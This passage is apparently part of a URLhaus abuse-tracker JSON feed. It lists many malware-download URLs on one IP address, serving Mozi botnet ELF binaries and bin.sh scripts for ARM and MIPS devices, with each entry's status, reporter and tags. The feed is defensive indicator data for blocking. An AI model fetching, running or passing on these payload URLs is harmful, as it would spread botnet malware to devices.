UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://89.160.20.156:41245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://89.160.20.156:48866/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://89.160.20.156:58258/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://89.160.20.156:34516/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://89.160.20.156:47851/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://89.160.20.156:49226/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://89.160.20.156:36957/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://89.160.20.156:53089/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://89.160.20.156:57114/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://89.160.20.156:33163/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://89.160.20.156:48557/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:34:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://89.160.20.156:59976/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://89.160.20.156:48291/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://89.160.20.156:45797/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://89.160.20.156:43741/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://89.160.20.156:35446/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://89.160.20.156:35720/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://89.160.20.156:50501/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://89.160.20.156:55796/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://89.160.20.156:52308/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://89.160.20.156:59154/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://89.160.20.156:57950/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://89.160.20.156:33520/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://89.160.20.156:45525/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://89.160.20.156:38430/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://89.160.20.156:4096/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://89.160.20.156:50631/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://89.160.20.156:37989/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://89.160.20.156:54078/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://89.160.20.156:34201/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://89.160.20.156:56573/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://89.160.20.156:48291/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://89.160.20.156:60102/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://89.160.20.156:52225/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://89.160.20.156:56733/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://89.160.20.156:57042/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://89.160.20.156:38035/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://89.160.20.156:33540/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://89.160.20.156:51947/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://89.160.20.156:36915/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://89.160.20.156:38865/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://89.160.20.156:55480/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://89.160.20.156:51996/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://89.160.20.156:36042/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:34 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://89.160.20.156:34350/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://89.160.20.156:53587/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://89.160.20.156:53444/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://89.160.20.156:58653/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://89.160.20.156:50579/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} 
+{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://89.160.20.156:3553/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://89.160.20.156:35288/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://89.160.20.156:46429/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://89.160.20.156:44575/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://89.160.20.156:43245/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://89.160.20.156:50444/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://89.160.20.156:51318/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://89.160.20.156:46221/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://89.160.20.156:51430/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://89.160.20.156:52028/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://89.160.20.156:48291/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://89.160.20.156:39613/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://89.160.20.156:34201/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://89.160.20.156:47095/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://89.160.20.156:42004/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://89.160.20.156:52058/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://89.160.20.156:45432/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://89.160.20.156:49891/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://89.160.20.156:34334/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://89.160.20.156:42886/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://89.160.20.156:47096/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://89.160.20.156:48214/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://89.160.20.156:40478/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://89.160.20.156:37771/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://89.160.20.156:35513/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://89.160.20.156:53382/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://89.160.20.156:50336/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://89.160.20.156:34233/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://89.160.20.156:38392/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://89.160.20.156:52654/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://89.160.20.156:60203/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://89.160.20.156:48091/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://89.160.20.156:40783/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
